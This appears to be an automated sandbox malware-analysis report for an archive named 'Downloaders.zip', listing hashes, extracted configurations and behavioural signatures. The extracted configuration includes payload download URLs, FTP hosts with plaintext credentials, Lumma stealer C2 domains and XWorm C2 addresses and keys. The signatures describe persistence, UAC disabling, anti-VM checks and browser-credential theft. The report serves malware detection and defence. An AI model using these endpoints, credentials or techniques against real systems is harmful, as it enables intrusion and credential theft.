Resubmissions
28-11-2024 02:19
241128-cr9sks1kht 1027-11-2024 21:08
241127-zyzyaawqgn 1027-11-2024 20:16
241127-y145caymbs 1027-11-2024 20:13
241127-yzlxdavlen 1027-11-2024 19:53
241127-yl61dsxpcs 1027-11-2024 19:38
241127-ycrjcaxkfx 1027-11-2024 19:03
241127-xqsswsslej 1027-11-2024 19:03
241127-xqf44aslcr 327-11-2024 19:02
241127-xpxqfsslan 327-11-2024 18:32
241127-w6pkqs1mek 10Analysis
-
max time kernel
751s -
max time network
2146s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
27-11-2024 19:03
Static task
static1
Behavioral task
behavioral1
Sample
Downloaders.zip
Resource
win11-20241007-en
General
-
Target
Downloaders.zip
-
Size
12KB
-
MD5
94fe78dc42e3403d06477f995770733c
-
SHA1
ea6ba4a14bab2a976d62ea7ddd4940ec90560586
-
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
-
SHA512
add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
-
SSDEEP
384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB
Malware Config
Extracted
https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/FF/3.png
Extracted
http://176.113.115.178/Windows-Update
Extracted
http://176.113.115.178/FF/1.png
Extracted
Protocol: ftp- Host:
72.52.244.4 - Port:
21 - Username:
ftp - Password:
999999
Extracted
Protocol: ftp- Host:
103.67.236.20 - Port:
21 - Username:
user - Password:
!root!
Extracted
Protocol: ftp- Host:
193.227.116.49 - Port:
21 - Username:
user - Password:
egoiste
Extracted
lumma
https://powerful-avoids.sbs
https://motion-treesz.sbs
https://disobey-curly.sbs
https://leg-sate-boat.sbs
https://story-tense-faz.sbs
https://blade-govern.sbs
https://occupy-blushi.sbs
https://frogs-severz.sbs
https://property-imper.sbs
https://p3ar11fter.sbs
https://3xp3cts1aim.sbs
https://owner-vacat10n.sbs
https://peepburry828.sbs
https://p10tgrace.sbs
https://befall-sm0ker.sbs
https://librari-night.sbs
https://processhol.sbs
https://cook-rain.sbs
Extracted
xworm
5.0
68.178.207.33:7000
sSM7p4MT4JctLnRS
-
install_file
USB.exe
Extracted
xworm
3.1
18.181.154.24:7000
w8DsMRIhXrOmk0Gn
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 6 IoCs
resource yara_rule behavioral1/memory/7948-7190-0x0000000000B40000-0x0000000000B4E000-memory.dmp family_xworm behavioral1/memory/1544-9276-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm behavioral1/memory/7948-7190-0x0000000000B40000-0x0000000000B4E000-memory.dmp family_xworm behavioral1/memory/1544-9276-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm behavioral1/memory/7948-7190-0x0000000000B40000-0x0000000000B4E000-memory.dmp family_xworm behavioral1/memory/1544-9276-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm -
Lumma family
-
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
description pid Process procid_target PID 6380 created 6256 6380 WerFault.exe 531 PID 6380 created 6256 6380 WerFault.exe 531 PID 6380 created 6256 6380 WerFault.exe 531 -
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 3540 created 3288 3540 Winsvc.exe 52 PID 8252 created 3288 8252 1465331686.exe 52 PID 8204 created 3288 8204 Reynolds.com 52 PID 3540 created 3288 3540 Winsvc.exe 52 PID 8252 created 3288 8252 1465331686.exe 52 PID 8204 created 3288 8204 Reynolds.com 52 PID 3540 created 3288 3540 Winsvc.exe 52 PID 8252 created 3288 8252 1465331686.exe 52 PID 8204 created 3288 8204 Reynolds.com 52 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Xmrig family
-
Xworm family
-
Contacts a large (5745) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ L.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ URGMwM6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ unik.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe -
XMRig Miner payload 6 IoCs
resource yara_rule behavioral1/memory/5208-3864-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp xmrig behavioral1/memory/5208-6514-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp xmrig behavioral1/memory/5208-3864-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp xmrig behavioral1/memory/5208-6514-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp xmrig behavioral1/memory/5208-3864-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp xmrig behavioral1/memory/5208-6514-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp xmrig -
Blocklisted process makes network request 21 IoCs
flow pid Process 242 7580 powershell.exe 244 7580 powershell.exe 837 5308 powershell.exe 838 2584 powershell.exe 838 2584 powershell.exe 857 5548 mshta.exe 863 4860 powershell.exe 242 7580 powershell.exe 244 7580 powershell.exe 837 5308 powershell.exe 838 2584 powershell.exe 838 2584 powershell.exe 857 5548 mshta.exe 863 4860 powershell.exe 242 7580 powershell.exe 244 7580 powershell.exe 837 5308 powershell.exe 838 2584 powershell.exe 838 2584 powershell.exe 857 5548 mshta.exe 863 4860 powershell.exe -
pid Process 6984 powershell.exe 7580 powershell.exe 5308 powershell.exe 2584 powershell.exe 4860 powershell.exe 5992 powershell.exe 7060 powershell.exe 3016 powershell.exe 5196 powershell.exe 6560 powershell.exe 3736 powershell.exe 8320 powershell.exe 8884 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS procexp64.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe procexp64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "\"C:\\PROGRAM FILES (X86)\\PROCEXP64.EXE\"" procexp64.exe -
Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 5464 cmd.exe 5304 net.exe 7076 net.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" procexp64.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2984 chrome.exe 6440 chrome.exe 5328 chrome.exe 6868 msedge.exe 5888 msedge.exe 6756 chrome.exe 8312 msedge.exe 6688 msedge.exe 5692 msedge.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion URGMwM6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion unik.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion URGMwM6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion unik.exe -
Drops startup file 6 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk 9758xBqgE1azKnB.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs Winsvc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk IMG001.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk 9758xBqgE1azKnB.exe -
Executes dropped EXE 64 IoCs
pid Process 2044 pei.exe 5996 random.exe 5284 hack1226.exe 5968 tdrpload.exe 704 1352515001.exe 1092 URGMwM6.exe 3540 Winsvc.exe 2568 sysnldcvmr.exe 4652 TPB-1.exe 6212 gvndxfghs.exe 6404 gvndxfghs.exe 5384 gvndxfghs.exe 6900 gvndxfghs.exe 3036 random.exe 6796 unik.exe 5208 xblkpfZ8Y4.exe 4488 test28.exe 7020 3245516675.exe 6084 test26.exe 7164 test27.exe 1456 test29.exe 6804 test25.exe 5976 test24.exe 2416 166715695.exe 9140 tik-tok-1.0.5.0-installer_iPXA-F1.exe 8252 1465331686.exe 8348 79144613.exe 8916 main_v4.exe 7676 TikTok18.exe 7788 TikTok18.exe 7780 262792613.exe 7832 2433825779.exe 7448 1989520276.exe 6628 hack1226.exe 9200 main_v4.exe 5616 random.exe 6836 test24.exe 8740 test25.exe 6600 test26.exe 8764 test27.exe 7272 test28.exe 5588 test29.exe 8316 fHR9z2C.exe 8852 AmLzNi.exe 1920 2785416532.exe 5008 sysnldcvmr.exe 8640 211929483.exe 7460 2704917330.exe 6228 89648440.exe 5244 Xworm%20V5.6.exe 7948 XClient.exe 6808 VBVEd6f.exe 5328 test12.exe 4452 1223029666.exe 6464 test6.exe 8356 Mesa.com 7912 test14.exe 1876 pantest.exe 8172 test9.exe 3056 test10-29.exe 7896 1810918076.exe 6096 test19.exe 6256 test10.exe 5740 test_again4.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Wine L.exe Key opened \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Wine URGMwM6.exe Key opened \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Wine unik.exe Key opened \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Wine random.exe -
Loads dropped DLL 3 IoCs
pid Process 6256 ttl.exe 6256 ttl.exe 6256 ttl.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook gvndxfghs.exe Key opened \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook gvndxfghs.exe Key opened \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook gvndxfghs.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" tdrpload.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe" 2785416532.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe" win.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" IMG001.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\9758xBqgE1azKnB = "C:\\Users\\Admin\\AppData\\Roaming\\9758xBqgE1azKnB.exe" 9758xBqgE1azKnB.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: procexp64.exe File opened (read-only) \??\T: procexp64.exe File opened (read-only) \??\V: procexp64.exe File opened (read-only) \??\H: procexp64.exe File opened (read-only) \??\I: procexp64.exe File opened (read-only) \??\M: procexp64.exe File opened (read-only) \??\N: procexp64.exe File opened (read-only) \??\O: procexp64.exe File opened (read-only) \??\E: procexp64.exe File opened (read-only) \??\G: procexp64.exe File opened (read-only) \??\J: procexp64.exe File opened (read-only) \??\R: procexp64.exe File opened (read-only) \??\X: procexp64.exe File opened (read-only) \??\W: procexp64.exe File opened (read-only) \??\Y: procexp64.exe File opened (read-only) \??\A: procexp64.exe File opened (read-only) \??\B: procexp64.exe File opened (read-only) \??\K: procexp64.exe File opened (read-only) \??\P: procexp64.exe File opened (read-only) \??\Q: procexp64.exe File opened (read-only) \??\L: procexp64.exe File opened (read-only) \??\U: procexp64.exe File opened (read-only) \??\Z: procexp64.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 184 bitbucket.org 185 bitbucket.org 242 bitbucket.org -
pid Process 2648 arp.exe 4868 cmd.exe 3620 ARP.EXE -
Power Settings 1 TTPs 12 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4940 powercfg.exe 7972 cmd.exe 3752 powercfg.exe 6212 powercfg.exe 4100 powercfg.exe 660 powercfg.exe 5192 powercfg.exe 5644 powercfg.exe 8684 powercfg.exe 3352 powercfg.exe 4200 powercfg.exe 6828 powercfg.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe LB31.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt procexp64.exe -
Enumerates processes with tasklist 1 TTPs 7 IoCs
pid Process 9184 tasklist.exe 5564 tasklist.exe 6792 tasklist.exe 7592 tasklist.exe 6468 tasklist.exe 5288 tasklist.exe 6016 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
pid Process 5996 random.exe 1092 URGMwM6.exe 3036 random.exe 6796 unik.exe 5616 random.exe 6140 L.exe 5996 random.exe 1092 URGMwM6.exe 3036 random.exe 6796 unik.exe 5616 random.exe 6140 L.exe 5996 random.exe 1092 URGMwM6.exe 3036 random.exe 6796 unik.exe 5616 random.exe 6140 L.exe -
Suspicious use of SetThreadContext 33 IoCs
description pid Process procid_target PID 6212 set thread context of 6404 6212 gvndxfghs.exe 126 PID 6212 set thread context of 5384 6212 gvndxfghs.exe 127 PID 6212 set thread context of 6900 6212 gvndxfghs.exe 128 PID 3540 set thread context of 6624 3540 Winsvc.exe 157 PID 6624 set thread context of 7276 6624 InstallUtil.exe 203 PID 4808 set thread context of 8228 4808 vg9qcBa.exe 394 PID 5616 set thread context of 6512 5616 7mpPLxE.exe 420 PID 8204 set thread context of 4200 8204 Reynolds.com 446 PID 4200 set thread context of 4972 4200 Reynolds.com 452 PID 5172 set thread context of 1544 5172 9758xBqgE1azKnB.exe 476 PID 8968 set thread context of 2976 8968 LB31.exe 512 PID 6212 set thread context of 6404 6212 gvndxfghs.exe 126 PID 6212 set thread context of 5384 6212 gvndxfghs.exe 127 PID 6212 set thread context of 6900 6212 gvndxfghs.exe 128 PID 3540 set thread context of 6624 3540 Winsvc.exe 157 PID 6624 set thread context of 7276 6624 InstallUtil.exe 203 PID 4808 set thread context of 8228 4808 vg9qcBa.exe 394 PID 5616 set thread context of 6512 5616 7mpPLxE.exe 420 PID 8204 set thread context of 4200 8204 Reynolds.com 446 PID 4200 set thread context of 4972 4200 Reynolds.com 452 PID 5172 set thread context of 1544 5172 9758xBqgE1azKnB.exe 476 PID 8968 set thread context of 2976 8968 LB31.exe 512 PID 6212 set thread context of 6404 6212 gvndxfghs.exe 126 PID 6212 set thread context of 5384 6212 gvndxfghs.exe 127 PID 6212 set thread context of 6900 6212 gvndxfghs.exe 128 PID 3540 set thread context of 6624 3540 Winsvc.exe 157 PID 6624 set thread context of 7276 6624 InstallUtil.exe 203 PID 4808 set thread context of 8228 4808 vg9qcBa.exe 394 PID 5616 set thread context of 6512 5616 7mpPLxE.exe 420 PID 8204 set thread context of 4200 8204 Reynolds.com 446 PID 4200 set thread context of 4972 4200 Reynolds.com 452 PID 5172 set thread context of 1544 5172 9758xBqgE1azKnB.exe 476 PID 8968 set thread context of 2976 8968 LB31.exe 512 -
resource yara_rule behavioral1/memory/5208-2259-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp upx behavioral1/memory/5208-3864-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp upx behavioral1/memory/5208-6514-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp upx behavioral1/memory/5208-2259-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp upx behavioral1/memory/5208-3864-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp upx behavioral1/memory/5208-6514-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp upx behavioral1/memory/5208-2259-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp upx behavioral1/memory/5208-3864-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp upx behavioral1/memory/5208-6514-0x00007FF6B7040000-0x00007FF6B7C90000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\ntkrnlmp.pdb procexp64.exe File opened for modification C:\Program Files (x86)\exe\ntkrnlmp.pdb procexp64.exe File opened for modification C:\Program Files (x86)\symbols\exe\ntkrnlmp.pdb procexp64.exe -
Drops file in Windows directory 18 IoCs
description ioc Process File opened for modification C:\Windows\VatBukkake 0fVlNye.exe File created C:\Windows\sysnldcvmr.exe 2785416532.exe File opened for modification C:\Windows\RipeHaiti VBVEd6f.exe File opened for modification C:\Windows\IdeasApp 0fVlNye.exe File opened for modification C:\Windows\TeddySecretariat 0fVlNye.exe File opened for modification C:\Windows\OrganDiscretion 0fVlNye.exe File created C:\Windows\sysnldcvmr.exe tdrpload.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\ComfortSick 0fVlNye.exe File opened for modification C:\Windows\CentralAvoiding 0fVlNye.exe File opened for modification C:\Windows\JoiningMazda 0fVlNye.exe File opened for modification C:\Windows\KeyboardsTwin 0fVlNye.exe File opened for modification C:\Windows\sysnldcvmr.exe tdrpload.exe File opened for modification C:\Windows\CoCurious VBVEd6f.exe File opened for modification C:\Windows\DownReceptor 0fVlNye.exe File opened for modification C:\Windows\UruguayNorthern 0fVlNye.exe File opened for modification C:\Windows\MozambiqueAppropriate 0fVlNye.exe File created C:\Windows\Tasks\UAC.job schtasks.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2852 sc.exe 6264 sc.exe 9184 sc.exe 3864 sc.exe 5528 sc.exe 8256 sc.exe 5280 sc.exe 3100 sc.exe 1440 sc.exe 6560 sc.exe 7676 sc.exe 7664 sc.exe 9036 sc.exe 3488 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 6 IoCs
pid pid_target Process procid_target 7848 7448 WerFault.exe 204 7960 5616 WerFault.exe 235 7848 7448 WerFault.exe 204 7960 5616 WerFault.exe 235 7848 7448 WerFault.exe 204 7960 5616 WerFault.exe 235 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pei.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvndxfghs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 166715695.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 79144613.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 89648440.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VBVEd6f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1810918076.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7mpPLxE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvndxfghs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tik-tok-1.0.5.0-installer_iPXA-F1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hack1226.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language L.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hack1226.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2433825779.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysnldcvmr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mesa.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IMG001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language URGMwM6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language main_v4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language main_v4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tdrpload.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7mpPLxE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysnldcvmr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 262792613.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvndxfghs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0fVlNye.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9758xBqgE1azKnB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TikTok18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1989520276.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
